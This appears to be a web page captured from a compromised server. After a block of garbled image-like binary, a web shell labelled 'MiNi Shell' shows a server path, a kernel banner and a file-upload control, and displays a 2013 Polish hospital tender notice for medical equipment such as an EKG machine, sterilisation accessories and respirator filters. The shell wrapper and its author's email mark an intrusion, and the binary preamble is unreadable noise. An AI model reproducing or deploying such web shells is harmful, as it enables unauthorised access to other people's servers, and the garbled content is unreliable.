JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130327/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130327/121540-N-2013.html

<p class="kh_header"><b>Sosnowiec: DOSTAWA SPRZĘTU MEDYCZNEGO ORAZ URZĄDZEŃ; 
 zgrzewarka rotacyjna, akcesoria do sterylizacji, lampa zabiegowa, aparat EKG, kozetki drewniane, deska ortopedyczna, akcesoria do respiratora, elektrody do EMG</b><br>
<b>Numer ogłoszenia: 121540 - 2013; data zamieszczenia: 27.03.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Samodzielny Publiczny Szpital Miejski w Sosnowcu , ul. Szpitalna 1, 41-219 Sosnowiec, woj. śląskie, tel. 32 41 30 111, faks 32 41 30 112.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.szpital.sosnowiec.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> DOSTAWA SPRZĘTU MEDYCZNEGO ORAZ URZĄDZEŃ; 
 zgrzewarka rotacyjna, akcesoria do sterylizacji, lampa zabiegowa, aparat EKG, kozetki drewniane, deska ortopedyczna, akcesoria do respiratora, elektrody do EMG.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zamówienie składa się z 8 części tzw. Pakietów, z których każdy stanowi oddzielny przedmiot zamówienia: 
Pakiet 1 - zgrzewarka rotacyjna - 1szt.,
Pakiet 2 - akcesoria do sterylizacji, 
Pakiet 3 - lampa jednoogniskowa bezcieniowa - 2 szt.,
Pakiet 4 - aparat EKG - 1 szt. , 
Pakiet 5 - kozetki drewniane  - 3 szt.,
Pakiet 6 - deska ortopedyczna - 1 szt. 
Pakiet 7 - filtry i trójnik do układu rur do respiratora,
Pakiet 8 - elektrody do badań EMG..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 42.66.41.00-9, 33.19.10.00-5, 33.16.70.00-8, 33.12.32.10-3, 33.19.20.00-2, 33.10.00.00-1.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 8.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 3.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Należy złożyć oświadczenie według załącznika nr 2 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Należy złożyć oświadczenie według załącznika nr 2 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Należy złożyć oświadczenie według załącznika nr 2 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Należy złożyć oświadczenie według załącznika nr 2 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Należy złożyć oświadczenie według załącznika nr 2 do SIWZ.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">Należ złożyć oświadczenie według załącznika nr 2 do SIWZ.
-    wypełniony prawidłowo załącznik nr 1.1 do 1.6 do SIWZ - zestawienie wymaganych parametrów technicznych, gwarancja i serwis;
-  dokumenty potwierdzające dopuszczenie oferowanych produktów do obrotu zgodnie z wymaganiami ustawy z 20.05.2010r. o wyrobach medycznych (Dz. U. nr 107 poz. 679) tj. certyfikat CE lub deklaracja zgodności - w zakresie Pakietu nr od 2-8 katalog lub folder w języku polskim.</p></li>



</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>zestawienie wymaganych parametrów technicznych, gwarancja i serwis;</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Wartość, o której mowa w § 2 ust. 1 może ulec zmianie wyłącznie w przypadku ustawowej zmiany stawki podatku VAT lub w przypadku korzystnych zmian cenowych dla Zamawiającego.Ceny brutto wynikające ze zmiany obowiązującej stawki VAT ulegną zmianie, przy zachowaniu cen netto podanych w ofercie.
Wynagrodzenie należne Wykonawcy podlega automatycznej waloryzacji (bez obowiązku wprowadzenia aneksem) odpowiednio o kwotę podatku VAT, wynikającą ze stawki tego podatku, obowiązującą w chwili powstania obowiązku podatkowego. 
Strony zastrzegają prawo do negocjacji cen jednostkowych, w  przypadku konieczności zapłaty Wykonawcy ceny  wyższej, powstałej w wyniku zmiany stawki podatku VAT.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.szpital.sosnowiec.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> w Samodzielnym Publicznym Szpitalu Miejskim w Sosnowcu, 41-219 Sosnowiec, ul. Szpitalna 1, Dział Zamówień Publicznych.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 04.04.2013 godzina 10:00, miejsce: w Samodzielnym Publicznym Szpitalu Miejskim w Sosnowcu, 41-219 Sosnowiec, ul. Szpitalna 1 - sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Pakiet nr 1 Zgrzewarka rotacyjna z wbudowaną drukarką i obcinarką rękawów oraz stołem roboczym..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Oferent/Producent
Nazwa i typ
Kraj pochodzenia
Rok produkcji 2013, fabrycznie nowa
Zgrzewarka rolkowa z wbudowaną drukarką
Menu w j. polskim
Wyświetlacz min. jednowierszowy
Licznik ilości wykonanych zgrzewów z możliwością kasowania, licznik czasu pracy
Pamięć wprowadzonych informacji
Automatyczny start/stop napędu
Automatyczna kontrola temperatury zgrzewania
Wyświetlanie temperatury zgrzewania
Termiczny wyłącznik bezpieczeństwa chroniący listwy grzejne zgrzewarki przed przegrzaniem
Szybkość zgrzewania min. 10 m/min
Szerokość zgrzeiny min. 12 mm
Możliwość ustawienie temperatury zgrzewania w zakresie min. 80 - 200 oC
Automatyczna kontrola odchyłki temperatury, w przypadku przekroczenia wartości max +/- 2 % następuje samoczynne zatrzymanie napędu
Możliwość podłączenie zewnętrznego urządzenia do walidacji zgrzewów
Obudowa zgrzewarki ze stali kwasoodpornej
Stolik rolkowy 
Drukarka min. jednowierszowa
Drukowanie następujących danych: daty produkcji i daty ważności oraz automatyczna ich aktualizacja, nr wsadu, nr pakietu, nr osoby pakującej i odpowiedzialnej za sterylizację i inne
Możliwość obrotu wydruku o 180 o
Drukowanie symboli zgodnych z normą EN 980, drukowanie znaku CE
Prosta wymiana kasety/taśmy drukującej
Zapasowa kaseta/taśma drukująca, min. 2 szt. + 1 szt. w zgrzewarce
Stół roboczy pod zgrzewarkę i obcinarkę,
wymiary: 
1200 mm x 650 mm x 850 mm  +/- 50 mm dla każdej wartości granicznej (długość x szerokość x wysokość) 
wykonany ze stali kwasoodpornej
możliwość wypoziomowania stołu
Obcinarka rękawów z dystrybutorem  jednopoziomowym montowana nad/obok zgrzewarki
szerokość cięcia - 750 mm +/-  50 mm, 
wykonana ze stali kwasoodpornej, 
zapasowy moduł tnący.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 42.66.41.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 3.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Pakiet nr 2 Akcesoria do sterylizacji - tace, pojemniki z pokrywą, maty, osłonki na narzędzia..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Taca sterylizacyjna 
wykonana z blachy perforowanej ze stali kwasoodpornej 
naroża tacy zaokrąglone
uchwyty wykładane do wnętrza tacy 
dno tacy wzmocnione drutem
możliwość ustawiana tac jedna na drugą
wymiary tac obecnie używanych w sterylizatorze Zamawiającego:
1. 480 x 240 x 50 mm 
2. 240 x 240 x 50 mm 

Tace: poz. 1 ilość 2 szt, poz. 2 ilość 3 szt.
Pojemnik sterylizacyjny z pokrywą:
pokrywa z uszczelką silikonową i zaworami w pokrywie 
klamrowe zamykanie
możliwość identyfikacji pojemników
możliwość ustawienia pojemników jeden na drugim
wykonane z materiału kwasoodpornego
wymiary i budowa pojemnika zgodna z normą PN EN 868-8:
1.600 x 300 x 135 mm +/-   20 mm  dla każdej wartości granicznej - 2 szt.
2.300 x 300 x 135 mm +/-  20 mm dla każdej wartości granicznej - 1 szt.
Mata silikonowa z jeżem do wkładania tac sterylizacyjnych - 10 szt.
wymiary: 500 x 210 mm +/- 20 mm dla każdej wartości granicznej
Osłonki silikonowe na narzędzia
1.kolor biały 1,6 x 19 mm - 100 szt.
2.kolor zielony 2,8 x 19 mm - 100 szt.
Okres pełnej gwarancji na tace i pojemniki z pokrywą - min. 12 miesięcy liczony od dnia protokolarnego odbioru przedmiotu przez Zamawiającego
Instrukcja obsługi w języku polskim.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.19.10.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 3.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Pakiet nr 3 Lampa zabiegowa - 2 szt..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lampa wykonana w technologii LED
Wersja mobilna, stabilny statyw, min. 2 kółka z możliwością blokady
Natężenia oświetlenia w odległości 30 cm min. 100 000 lux
Natężenia oświetlenia w odległości 100 cm min. 10 000 lux
Średnica pola oświetleniowego w odległości 100 cm ma  28 cm
Temperatura barwowa. 4700 K +/- 100K
Żywotność diod min. 50 000 h Elastyczne, stabilne ramię typu  gęsia szyja pozwalające na dokładne oświetlenie badanego pola
Warunki gwarancji i serwisu
Przeglądy techniczne bezpłatne w okresie gwarancji - ilość przeglądów zgodnie z zaleceniami producenta, nie mniej niż jeden w roku.
Okres pełnej gwarancji - min. 24 miesiące liczony od dnia protokolarnego odbioru przedmiotu przez Zamawiającego
Założenie paszportu technicznego dla każdej lampy
Czas reakcji na zgłoszenie awarii - max 48h od momentu zgłoszenia (w dni robocze)
W przypadku naprawy lampy bądź jej elementów trwającej dłużej niż dwa tygodnie - urządzenie zastępcze na czas naprawy oraz przedłużenie gwarancji o czas naprawy wykonywanej w autoryzowanym serwisie.
W przypadku wymiany przedmiotu zamówienia na nowy okres gwarancji (24 miesiące), liczony od momentu wymiany przedmiotu na nowy.
Lokalizacja serwisu gwarancyjnego:
adres, telefon, fax, dane serwisanta uprawnionego do odebrania i przyjęcia do realizacji ewentualnych zgłoszeń awarii
Koszty transportu do i z serwisu w okresie gwarancji pokrywa Wykonawca
Lokalizacja serwisu pogwarancyjnego, adres, telefon, fax, dane serwisanta uprawnionego do odebrania i przyjęcia do realizacji ewentualnych zgłoszeń awarii Instrukcja obsługi w języku polskim - 3 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.16.70.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 3.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Paniet nr 4 Aparat EKG - 1 szt..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Rok produkcji 2013, fabrycznie nowy
Aparat EKG z kolorowym monitorem/wyświetlaczem, 
o przekątnej min. 5,7
Wyposażenie: kabel zasilający, kabel pacjenta i dwa komplety elektrod przedsercowych i kończynowych 
dla dorosłych, pediatryczny
Aparat z klawiaturą alfanumeryczną i funkcyjną
Zasilanie sieciowe i akumulatorowe
Komunikacja w języku polskim
Wbudowana drukarka
Wydruk w trybie min. 3 kanałów
Szerokość papieru min. 110 mm
Sygnał EKG  12 odprowadzeń standardowych
Detekcja impulsów stymulatora
Ciągły pomiar częstości akcji serca (HR)
Sygnalizacja złego kontaktu poszczególnych elektrod
Aparat 3,6 i 12 kanałowy
Ręczny i automatyczny tryb pracy
Ilość poziomów czułości min. 4
( 2,5; 5; 10; 20 mm/mV)
Ilość prędkości zapisu min. 4 
(5; 10; 25; 50 mm/s)
Filtracja zakłóceń sieciowych i zakłóceń pochodzenia mięśniowego
Analiza zapisów i interpretacja
Funkcja archiwizacji danych
Akcesoria zapasowe:
papier do EKG w ilości, min. 5 szt.
kabel pacjenta
komplet elektrod przedsercowych (przyssawki) i kończynowych (klipsy) - dla dorosłych 
Żel EKG min. 1 szt.
Stolik jezdny
Warunki gwarancji i serwisu
W okresie gwarancji przeglądy techniczne (bez dodatkowej zapłaty) - ilość przeglądów zgodnie z zaleceniami producenta, nie mniej niż jeden w roku
Okres pełnej gwarancji - min. 24 miesiące liczony od dnia protokolarnego odbioru przedmiotu przez Zamawiającego
Założenie paszportu technicznego 
Czas reakcji na zgłoszenie awarii - max 48h od momentu zgłoszenia (w dni robocze)
W przypadku naprawy urządzenia bądź jego elementów trwającej dłużej niż dwa tygodnie - urządzenie zastępcze na czas naprawy oraz przedłużenie gwarancji  o czas naprawy wykonywanej w autoryzowanym serwisie
W przypadku wymiany przedmiotu zamówienia na nowy okres gwarancji (24 miesiące), liczony od momentu wymiany przedmiotu na nowy
Lokalizacja serwisu gwarancyjnego:
adres, telefon, fax, dane serwisanta uprawnionego do odebrania i przyjęcia do realizacji ewentualnych zgłoszeń awarii
Koszty transportu do i z serwisu w okresie gwarancji pokrywa Wykonawca
Lokalizacja serwisu pogwarancyjnego:
adres, telefon, fax, dane serwisanta uprawnionego do odebrania i przyjęcia do realizacji ewentualnych zgłoszeń awarii
Instrukcja obsługi w języku polskim - 2 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.12.32.10-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 3.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Pakiet nr 5 Kozetka drewniana - 3 szt..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Rok produkcji 2013, fabrycznie nowa
Kozetka drewniana, medyczna przeznaczona do wykonywania badań EKG
Trwała i stabilna drewniana konstrukcja, nie zwierająca elementów metalowych
Kolor drewna - jasny buk
Kolor tapicerki do wyboru przez Zamawiającego (odcienie beżu 
i pomarańczu)
Tapicerka wykonana z tworzywa trwałego i odpornego na środki dezynfekcyjne używane w szpitalach
Wymiary:
wysokość z materacem 60 cm  +/- 5 cm
szerokość 65 cm +/- 5 cm
długość całkowita 190 cm +/- 10 cm
Regulacja kąta nachylenia zagłówka 0st. i  35st. +/- 5st.
Dopuszczalne obciążenie min. 200 kg
Uchwyt na podkład w rolce
Schodek/podest z drewnianą platformą ułatwiający bezpieczne wejście na kozetkę
Okres pełnej gwarancji - min. 24 miesiące.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.19.20.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 3.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Pakiet nr 6 Deska ortopedyczna - 1 szt..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Rok produkcji 2013, fabrycznie nowa
Tworzywo sztuczne, zmywalne, przepuszczalne dla promieni X
Ciężar deski max. 10 kg
Nośność deski min. 130 kg
Wymiary deski: 
długość: 1850 mm +/- 50 mm
szerokość: 450 mm +/- 50 mm
Min. 1 komplet pasów zabezpieczających
Wielkość uchwytów transportowych umożliwiająca bezpieczny i wygodny uchwyt
Stabilizator głowy
Okres pełnej gwarancji - min. 12 miesiące.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.10.00.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 3.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Pakiet nr 7 Akcesoria do respiratora Bennett typ 760.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Filtr bakteryjny powietrza wydychanego, wielokrotnego użytku szt.4 Filtr bakteryjny powietrza wdychanego, wielokrotnego użytku szt. 4 Trójnik do układu rur dla dorosłych, wielokrotnego użytku 1 op.10 szt op 1.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.19.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 30.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Pakiet nr 8 Elektrody do aparatu EMG KEY POINT.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Elektroda do stymulacji z kablem o długości 2m szt.2 Elektroda czuciowa szt.1 Kabel do elektrod czuciowych szt.1 Paski do elektrody czuciowej szt 4 Elektroda uziemiająca 45cm 20mm szt.1 Uchwyt do elektrody stymulacyjnej 50cm 2cm szt.2.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.19.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 3.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com